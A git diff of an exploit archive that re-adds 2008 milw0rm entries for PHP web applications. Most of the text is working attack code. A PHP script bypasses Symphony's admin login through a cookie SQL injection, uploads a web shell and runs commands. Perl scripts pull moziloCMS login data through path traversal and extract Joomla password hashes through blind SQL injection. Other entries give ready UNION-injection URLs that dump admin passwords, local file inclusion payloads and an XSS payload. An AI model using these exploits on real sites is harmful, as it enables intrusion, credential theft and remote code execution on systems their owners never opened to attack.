+ + + Source code (includes/functions.inc.php line 32) + --------------------------------------------------------------------- + $this->core->user_id = $this->user_id; + --------------------------------------------------------------------- + + +Now if you want to get the admin privileges and by pass the login, you +have to create a cookie like this below: + + + --------------------------------------------------------------------- + PXL=a' OR username='admin + --------------------------------------------------------------------- + + +To do that you can use 'Modify Headers'. + + + +======================================================================= + +# milw0rm.com [2008-07-31] diff --git a/platforms/php/webapps/6177.php b/platforms/php/webapps/6177.php index e104b0544..4f5ceb20b 100755 --- a/platforms/php/webapps/6177.php +++ b/platforms/php/webapps/6177.php 
@@ -1,142 +1,142 @@ -_db->fetchRow(0, $sql); -[...] -} -[...] -if(isset($_COOKIE[__SYM_COOKIE__])){ -$args = unserialize($_COOKIE[__SYM_COOKIE__]); -$result = $this->login($args['username'], $args['password'], true, false); -} -------------------[/source code]--------------------- -password value from cookie is not properly sanitized so the code above is vulnerable -to a SQL-injection which leads to admin authorization bypass. - -ii) arbitrary file upload in admin panel -file manager in admin panel allows arbitrary file upload including php scripts. This vuln -is actual only for non-patched version, nevertheless the SQL-injection above works on -patched version too -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",10); - -$url = $argv[1]; -$cmd = $argv[2]; - -$url_parts = parse_url($url); -$host = $url_parts['host']; -$path = $url_parts['path']; -if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80; - -echo "[~] Uploading shell... "; -exploit($host,$path,$port) ? print("OK\n") : die("Failed\n"); - -echo "[~] Executing command... 
"; -$res = cmd($host,$path,$port,$cmd); -if ($res) { - printf("OK\n%'-65s\n%s%'-65s\n",'',$res,''); -}else { - die("Failed"); -} - -function exploit($host,$path,$port) { - $ock = fsockopen(gethostbyname($host),$port); - if (!$ock) return false; - - $data = "--------bndry31337\r\n"; - $data.= "Content-Disposition: form-data; "; - $data.= "name=\"file\"; filename=\"s.php\"\r\n"; - $data.= "Content-Type: text/plain\r\n\r\n"; - $data.= "\r\n"; - $data.= "--------bndry31337\r\n"; - - $data.= "--------bndry31337\r\n"; - $data.= "Content-Disposition: form-data; name=\"filter\"\r\n\r\n"; - $data.= "--------bndry31337\r\n"; - - $data.= "--------bndry31337\r\n"; - $data.= "Content-Disposition: form-data; name=\"destination\"\r\n\r\n"; - $data.= "workspace/masters/\r\n"; - $data.= "--------bndry31337\r\n"; - - $data.= "--------bndry31337\r\n"; - $data.= "Content-Disposition: form-data; name=\"action[upload]\"\r\n\r\n"; - $data.= "Upload\r\n"; - $data.= "--------bndry31337\r\n"; - - $data.= "--------bndry31337\r\n"; - $data.= "Content-Disposition: form-data; name=\"with-selected\"\r\n\r\n"; - $data.= "With selected...\r\n"; - $data.= "--------bndry31337\r\n"; - - $packet = "POST {$path}symphony/?page=/publish/filemanager/ HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n"; - $packet.= "Cookie: sym_auth=a%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22"; - $packet.= "admin%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%2231337%27+OR+1%3D1+"; - $packet.= "+LIMIT+1%2F%2A%22%3Bs%3A2%3A%22id%22%3Bi%3A1%3B%7D\r\n"; - $packet.= "Content-Type: multipart/form-data; boundary=------bndry31337\r\n"; - $packet.= "Content-Length: ".strlen($data)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - - $packet.= $data; - - fputs($ock, $packet); - $html=''; - while (!feof($ock)) $html.=fgets($ock); - - return preg_match('@Location: .+?upload-success@',$html) ? 
true : false; -} - -function cmd($host,$path,$port,$cmd) { - $ock = fsockopen(gethostbyname($host),$port); - if (!$ock) return false; - $data = "c=".urlencode($cmd); - $packet = "POST {$path}workspace/masters/s.php HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n"; - $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.= "Content-Length: ".strlen($data)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $packet.= $data."\r\n"; - fputs($ock, $packet); - $html=''; - while (!feof($ock)) $html.=fgets($ock); - list($headers,$res)=explode("\r\n\r\n",$html); - return strlen($res) ? $res : false; -} - -?> - -# milw0rm.com [2008-07-31] +_db->fetchRow(0, $sql); +[...] +} +[...] +if(isset($_COOKIE[__SYM_COOKIE__])){ +$args = unserialize($_COOKIE[__SYM_COOKIE__]); +$result = $this->login($args['username'], $args['password'], true, false); +} +------------------[/source code]--------------------- +password value from cookie is not properly sanitized so the code above is vulnerable +to a SQL-injection which leads to admin authorization bypass. + +ii) arbitrary file upload in admin panel +file manager in admin panel allows arbitrary file upload including php scripts. This vuln +is actual only for non-patched version, nevertheless the SQL-injection above works on +patched version too +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",10); + +$url = $argv[1]; +$cmd = $argv[2]; + +$url_parts = parse_url($url); +$host = $url_parts['host']; +$path = $url_parts['path']; +if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80; + +echo "[~] Uploading shell... "; +exploit($host,$path,$port) ? print("OK\n") : die("Failed\n"); + +echo "[~] Executing command... 
"; +$res = cmd($host,$path,$port,$cmd); +if ($res) { + printf("OK\n%'-65s\n%s%'-65s\n",'',$res,''); +}else { + die("Failed"); +} + +function exploit($host,$path,$port) { + $ock = fsockopen(gethostbyname($host),$port); + if (!$ock) return false; + + $data = "--------bndry31337\r\n"; + $data.= "Content-Disposition: form-data; "; + $data.= "name=\"file\"; filename=\"s.php\"\r\n"; + $data.= "Content-Type: text/plain\r\n\r\n"; + $data.= "\r\n"; + $data.= "--------bndry31337\r\n"; + + $data.= "--------bndry31337\r\n"; + $data.= "Content-Disposition: form-data; name=\"filter\"\r\n\r\n"; + $data.= "--------bndry31337\r\n"; + + $data.= "--------bndry31337\r\n"; + $data.= "Content-Disposition: form-data; name=\"destination\"\r\n\r\n"; + $data.= "workspace/masters/\r\n"; + $data.= "--------bndry31337\r\n"; + + $data.= "--------bndry31337\r\n"; + $data.= "Content-Disposition: form-data; name=\"action[upload]\"\r\n\r\n"; + $data.= "Upload\r\n"; + $data.= "--------bndry31337\r\n"; + + $data.= "--------bndry31337\r\n"; + $data.= "Content-Disposition: form-data; name=\"with-selected\"\r\n\r\n"; + $data.= "With selected...\r\n"; + $data.= "--------bndry31337\r\n"; + + $packet = "POST {$path}symphony/?page=/publish/filemanager/ HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n"; + $packet.= "Cookie: sym_auth=a%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22"; + $packet.= "admin%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%2231337%27+OR+1%3D1+"; + $packet.= "+LIMIT+1%2F%2A%22%3Bs%3A2%3A%22id%22%3Bi%3A1%3B%7D\r\n"; + $packet.= "Content-Type: multipart/form-data; boundary=------bndry31337\r\n"; + $packet.= "Content-Length: ".strlen($data)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + + $packet.= $data; + + fputs($ock, $packet); + $html=''; + while (!feof($ock)) $html.=fgets($ock); + + return preg_match('@Location: .+?upload-success@',$html) ? 
true : false; +} + +function cmd($host,$path,$port,$cmd) { + $ock = fsockopen(gethostbyname($host),$port); + if (!$ock) return false; + $data = "c=".urlencode($cmd); + $packet = "POST {$path}workspace/masters/s.php HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n"; + $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.= "Content-Length: ".strlen($data)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $packet.= $data."\r\n"; + fputs($ock, $packet); + $html=''; + while (!feof($ock)) $html.=fgets($ock); + list($headers,$res)=explode("\r\n\r\n",$html); + return strlen($res) ? $res : false; +} + +?> + +# milw0rm.com [2008-07-31] diff --git a/platforms/php/webapps/6178.php b/platforms/php/webapps/6178.php index b32eb2269..be0dc5c40 100755 --- a/platforms/php/webapps/6178.php +++ b/platforms/php/webapps/6178.php 
@@ -1,252 +1,252 @@ -authenticate(); - - [...] - - 301. // Process language selection if present in URI or in user profile or try - 302. // autodetection if default charset is utf-8 - 303. if (!empty($_GET['lang'])) - 304. { - 305. $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang']; - 306. } - 307. - 308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php')) - 309. { - 310. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language - 311. $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________'); - 312. } - 313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2] - 314. { - 315. include('include/select_lang.inc.php'); - 316. if (file_exists('lang/' . $USER['lang'] . '.php')) - 317. { - 318. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language - 319. $CONFIG['lang'] = $USER['lang']; - 320. } - 321. } - 322. else - 323. { - 324. unset($USER['lang']); - 325. } - 326. - 327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang'])) - 328. { - 329. unset($CONFIG['default_lang']); - 330. } - 331. - 332. if (!file_exists("lang/{$CONFIG['lang']}.php")) - 333. $CONFIG['lang'] = 'english'; - 334. - 335. // We load the chosen language file - 336. require "lang/{$CONFIG['lang']}.php"; <======== [3] - - if $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could be able to - include an arbitrary local file through the require() at line 336 [3], due to $USER array can be manipulate by - cookies (see user_get_profile() function [1] defined into /include/functions.inc.php, near lines 128-146) - - [-] Path disclosure in /themes/sample/theme.php - - [-] Possible bug fix in /include/functions.inc.php - - 128. function user_get_profile() - 129. { - 130. global $CONFIG, $USER; - 131. - 132. if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) { - 133. 
$USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data'])); - 134. $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang']; - 135. } - -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); - -define(STDIN, fopen("php://stdin", "r")); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -function get_info() -{ - global $host, $path, $cookie, $version, $path_disc; - - $packet = "GET {$path} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $html = http_send($host, $packet); - - preg_match("/Set-Cookie: (.*)_data/", $html, $match); - $cookie = $match[1]; - - preg_match("/ # -#
    -# # -# # -# # -# # -#
    # -# # -#Your shell save in http://Site/imagebank/ # -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-08-02] +##################################################################################### +#### eVision 2.0 Sql Injection/Remote File Upload/IG #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz +# # +#DORK : :( # +# # +##################################################################################### +# [Sql Injection] # +# # +#Blind : http://Site/print.php?id=1'+and+1=1/* # +#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/* +#User : http://Site/iframe.php?field=username&module=users/* # +#Pass : http://Site/iframe.php?field=pass&module=users/* # +# [IG] # +#http://Site/admin/phpinfo.php # +# # +# [Remote File Upload] # +#Exploit : # +# # +# # +# # +#
    +# # +# # +# # +# # +#
    # +# # +#Your shell save in http://Site/imagebank/ # +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-08-02] diff --git a/platforms/php/webapps/6192.txt b/platforms/php/webapps/6192.txt index 9d3caae63..d1178423e 100755 --- a/platforms/php/webapps/6192.txt +++ b/platforms/php/webapps/6192.txt 
@@ -1,51 +1,51 @@ -================================================================================ -|| K-Links Directory SQL-INJECTION, XSS -================================================================================ - -Application: K-Links Directory ------------- - -Website: http://turn-k.net/k-links --------- - -Version: Platinum (All) --------- - -About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$. ------- - -Googledork: Powered By K-Links Directory ------------ - -Demo: http://klinksdemo.com ------ - -[ SQL-INJECTION ] - -http://host/report/-1[SQL] -http://host/visit.php?id=-1[SQL] -http://host/addreview/-1[SQL] -http://host/refer/-1[SQL] - -===>>> Exploit: - -http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/* - - -/* Admin Login - http://host/admin - -Manage Templates => web-shell */ - - -[ PASSIVE XSS :) ] - -http://host/index.php?req=login&redirect=&login_message= - - -Author: Corwin -------- - -Contact: corwin88[dog]mail[dot]ru --------- - -# milw0rm.com [2008-08-02] +================================================================================ +|| K-Links Directory SQL-INJECTION, XSS +================================================================================ + +Application: K-Links Directory +------------ + +Website: http://turn-k.net/k-links +-------- + +Version: Platinum (All) +-------- + +About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$. 
+------ + +Googledork: Powered By K-Links Directory +----------- + +Demo: http://klinksdemo.com +----- + +[ SQL-INJECTION ] + +http://host/report/-1[SQL] +http://host/visit.php?id=-1[SQL] +http://host/addreview/-1[SQL] +http://host/refer/-1[SQL] + +===>>> Exploit: + +http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/* + + +/* Admin Login - http://host/admin + +Manage Templates => web-shell */ + + +[ PASSIVE XSS :) ] + +http://host/index.php?req=login&redirect=&login_message= + + +Author: Corwin +------- + +Contact: corwin88[dog]mail[dot]ru +-------- + +# milw0rm.com [2008-08-02] diff --git a/platforms/php/webapps/6193.txt b/platforms/php/webapps/6193.txt index 78cd89748..6940b7e42 100755 --- a/platforms/php/webapps/6193.txt +++ b/platforms/php/webapps/6193.txt 
@@ -1,45 +1,45 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL Injection Vulnerability -## -## E-Store Kit-1 ( viewdetails.php pid ) -## E-Store Kit-2 ( viewdetails.php pid ) -## E-Store Kit-1 Pro PayPal Edition ( viewdetails.php pid ) -## E-Store Kit-2 PayPal Edition ( viewdetails.php pid ) -## -## www.magicscripts.com -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploites :]]- -## -## E-Store Kit-1 www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings-- -## E-Store Kit-2 www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings-- -## E-Store Kit-1 Pro PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings-- -## E-Store Kit-2 PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings-- -## -######################## -######################## ---[[ NOTE ]]-- -In admin panel none username only admin password ;D - -######################################################################################################### -######################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - -:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: -######################################################################################################### -######################################################################################################### - -# milw0rm.com [2008-08-02] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL Injection Vulnerability +## +## E-Store Kit-1 ( viewdetails.php pid ) +## E-Store Kit-2 ( viewdetails.php pid ) +## E-Store Kit-1 Pro PayPal Edition ( viewdetails.php pid ) +## E-Store Kit-2 PayPal Edition ( viewdetails.php pid ) +## +## www.magicscripts.com +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploites :]]- +## +## E-Store Kit-1 www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings-- +## E-Store Kit-2 www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings-- +## E-Store Kit-1 Pro PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings-- +## E-Store Kit-2 PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings-- +## +######################## +######################## +--[[ NOTE ]]-- +In admin panel none username only admin password ;D + +######################################################################################################### 
+######################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + +:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: +######################################################################################################### +######################################################################################################### + +# milw0rm.com [2008-08-02] diff --git a/platforms/php/webapps/6194.pl b/platforms/php/webapps/6194.pl index 13c7b2956..6bb230786 100755 --- a/platforms/php/webapps/6194.pl +++ b/platforms/php/webapps/6194.pl 
@@ -1,107 +1,107 @@ -#!/usr/bin/perl -# -# moziloCMS 1.10.1 Perl exploit -# -# discovered & written by Ams -# ax330d [doggy] gmail [dot] com -# -# DESCRIPTION: -# Vulnerability hides in "download.php", which we can use to download any file we want to. -# Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open -# not looking on that it is protected by .htaccess) -# Script does not filters global params, it only checks whether local file exists... -# (By the way, all downloads are logged to "/conf/downloads.conf") -# -# USAGE: -# Run exploit :perl expl.pl http://www.site.com -# -# NEEDED: -# magic_quotes_gpc = off -# - -use strict; -use IO::Socket; - -print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - \n\t\t moziloCMS 1.10.1 exploit (by Ams) - \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; - -if(@ARGV<1){ - die "\n\tUsage:\texpl.pl [host]\n\n - \n\tExample:\texpl.pl http://localhost/blog/\n\n"; -} - -my $expl_url = $ARGV[0]; - -print "\n\t[~] Starting exploit...\n"; - -if($expl_url =~ m#http://#) { - exploit($expl_url); -} else { - exploit('http://'.$expl_url); -} - -sub exploit { - - # Defining vars. - my $site = pop @_; - my ($a, $b, $c, @d) = split /\//,$site; - my $path = join('/',@d); - my $host = $c; - if($path) {$path = '/'.$path;} - my ($length, $packet, $downloaded, $injection); - - # Revealing /data/sess.php. 
- print "\n\t[~] Sending request to 'downloads.php'...\n"; - $injection = "file=hola&cat=../admin/conf/logindata.conf%00"; - $length = length($injection); - $packet = "POST $path/download.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet .= "Content-Length: $length\r\n\r\n"; - $packet .= "$injection"; - $downloaded = send_surprise($host, $packet, 1); - - if($downloaded =~ /hackin/) { - print "\n\t[-] Exploiting failed...\n"; - } elsif ($downloaded =~ /200 OK/) { - # Parsing and saving received data. - $downloaded =~ /\r\n\r\n/ ; - $downloaded = $'; - - open(DOWNL, ">hola.txt"); - print DOWNL $downloaded; - close(DOWNL); - print "\n\t[+] Looks like ok! Check hola.txt\n"; - } else { - print "\n\t[-] Exploiting failed...\n"; - } -} - -sub send_surprise() { - - my $dat = 1; - my ($host, $packet, $ret) = @_; - my $socket=IO::Socket::INET->new( - Proto=>"tcp", - PeerAddr=>$host, - PeerPort=>"80" - ); - if( ! $socket) { - return 0; - } else { - - print $socket $packet; - if($ret) { - my $rcv; - while($rcv = <$socket>) { - $dat .= $rcv; - } - } - close ($socket); - return $dat; - } -} - -# milw0rm.com [2008-08-02] +#!/usr/bin/perl +# +# moziloCMS 1.10.1 Perl exploit +# +# discovered & written by Ams +# ax330d [doggy] gmail [dot] com +# +# DESCRIPTION: +# Vulnerability hides in "download.php", which we can use to download any file we want to. +# Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open +# not looking on that it is protected by .htaccess) +# Script does not filters global params, it only checks whether local file exists... 
+# (By the way, all downloads are logged to "/conf/downloads.conf") +# +# USAGE: +# Run exploit :perl expl.pl http://www.site.com +# +# NEEDED: +# magic_quotes_gpc = off +# + +use strict; +use IO::Socket; + +print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + \n\t\t moziloCMS 1.10.1 exploit (by Ams) + \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; + +if(@ARGV<1){ + die "\n\tUsage:\texpl.pl [host]\n\n + \n\tExample:\texpl.pl http://localhost/blog/\n\n"; +} + +my $expl_url = $ARGV[0]; + +print "\n\t[~] Starting exploit...\n"; + +if($expl_url =~ m#http://#) { + exploit($expl_url); +} else { + exploit('http://'.$expl_url); +} + +sub exploit { + + # Defining vars. + my $site = pop @_; + my ($a, $b, $c, @d) = split /\//,$site; + my $path = join('/',@d); + my $host = $c; + if($path) {$path = '/'.$path;} + my ($length, $packet, $downloaded, $injection); + + # Revealing /data/sess.php. + print "\n\t[~] Sending request to 'downloads.php'...\n"; + $injection = "file=hola&cat=../admin/conf/logindata.conf%00"; + $length = length($injection); + $packet = "POST $path/download.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length: $length\r\n\r\n"; + $packet .= "$injection"; + $downloaded = send_surprise($host, $packet, 1); + + if($downloaded =~ /hackin/) { + print "\n\t[-] Exploiting failed...\n"; + } elsif ($downloaded =~ /200 OK/) { + # Parsing and saving received data. + $downloaded =~ /\r\n\r\n/ ; + $downloaded = $'; + + open(DOWNL, ">hola.txt"); + print DOWNL $downloaded; + close(DOWNL); + print "\n\t[+] Looks like ok! Check hola.txt\n"; + } else { + print "\n\t[-] Exploiting failed...\n"; + } +} + +sub send_surprise() { + + my $dat = 1; + my ($host, $packet, $ret) = @_; + my $socket=IO::Socket::INET->new( + Proto=>"tcp", + PeerAddr=>$host, + PeerPort=>"80" + ); + if( ! 
$socket) { + return 0; + } else { + + print $socket $packet; + if($ret) { + my $rcv; + while($rcv = <$socket>) { + $dat .= $rcv; + } + } + close ($socket); + return $dat; + } +} + +# milw0rm.com [2008-08-02] diff --git a/platforms/php/webapps/6199.pl b/platforms/php/webapps/6199.pl index 8006ec100..c0a1b5d52 100755 --- a/platforms/php/webapps/6199.pl +++ b/platforms/php/webapps/6199.pl 
@@ -1,113 +1,113 @@ -#!/usr/bin/perl -#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." -use LWP::UserAgent; -use Getopt::Long; - -if(!$ARGV[1]) -{ - print " \n"; - print " ################################################################\n"; - print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n"; - print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; - print " # #\n"; - print " # Conctact: His0k4.hlm[at]gamil.com #\n"; - print " # Greetz: All friends & muslims HacKeRs #\n"; - print " # Greetz2: http://www.dz-secure.com #\n"; - print " # #\n"; - print " # Dork: inurl:com_ezstore #\n"; - print " # Usage: perl ezstore.pl host path #\n"; - print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n"; - print " # #\n"; - print " # Options: #\n"; - print " # -t Valid procuct id #\n"; - print " # -c Category value of the following product id #\n"; - print " ################################################################\n"; - - exit; -} - -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $cid = $ARGV[2]; -my $pid = $ARGV[3]; - -my %options = (); -GetOptions(\%options, "c=i", "x=s", "p=i"); - -print "[~] Exploiting...\n"; - -if($options{"c"}) -{ - $cid = $options{"c"}; -} - -if($options{"p"}) -{ - $pid = $options{"p"}; -} - -syswrite(STDOUT, "[~] MD5-Hash: ", 14); - -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $path, $cid, $pid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $path, $cid, $pid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} - -print "\n[~] Exploiting done\n"; - -sub istrue2 -{ - my $host = shift; - my $path = shift; - my $cid = shift; - my $pid = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." 
and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"x"}) - { - $ua->proxy('http', "http://".$options{"x"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "viewcategory&catid=".$cid.""; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } - -} - -# milw0rm.com [2008-08-03] +#!/usr/bin/perl +#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid." +use LWP::UserAgent; +use Getopt::Long; + +if(!$ARGV[1]) +{ + print " \n"; + print " ################################################################\n"; + print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n"; + print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; + print " # #\n"; + print " # Conctact: His0k4.hlm[at]gamil.com #\n"; + print " # Greetz: All friends & muslims HacKeRs #\n"; + print " # Greetz2: http://www.dz-secure.com #\n"; + print " # #\n"; + print " # Dork: inurl:com_ezstore #\n"; + print " # Usage: perl ezstore.pl host path #\n"; + print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n"; + print " # #\n"; + print " # Options: #\n"; + print " # -t Valid procuct id #\n"; + print " # -c Category value of the following product id #\n"; + print " ################################################################\n"; + + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $cid = $ARGV[2]; +my $pid = $ARGV[3]; + +my %options = (); +GetOptions(\%options, "c=i", "x=s", "p=i"); + +print "[~] Exploiting...\n"; + +if($options{"c"}) +{ + $cid = $options{"c"}; +} + +if($options{"p"}) +{ + $pid = $options{"p"}; +} + +syswrite(STDOUT, "[~] MD5-Hash: ", 14); + +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $path, $cid, $pid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $path, $cid, $pid, $i, $h)) + { 
+ $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} + +print "\n[~] Exploiting done\n"; + +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $cid = shift; + my $pid = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"x"}) + { + $ua->proxy('http', "http://".$options{"x"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "viewcategory&catid=".$cid.""; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } + +} + +# milw0rm.com [2008-08-03] diff --git a/platforms/php/webapps/6200.txt b/platforms/php/webapps/6200.txt index 207e89e0e..354e6ffb5 100755 --- a/platforms/php/webapps/6200.txt +++ b/platforms/php/webapps/6200.txt @@ -1,17 +1,17 @@ -###################################### -[+] syzygyCMS 0.3 Local File Inclusion -[+] Discovered By SirGod -[+] www.mortal-team.com -[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin -[+] also ToxicBlood,MesSiAH,xZu -###################################### - -Example : - -http://localhost/x/index.php?page=../../../autoexec.bat - -This will open autoexec.bat . - -########################################### - -# milw0rm.com [2008-08-03] +###################################### +[+] syzygyCMS 0.3 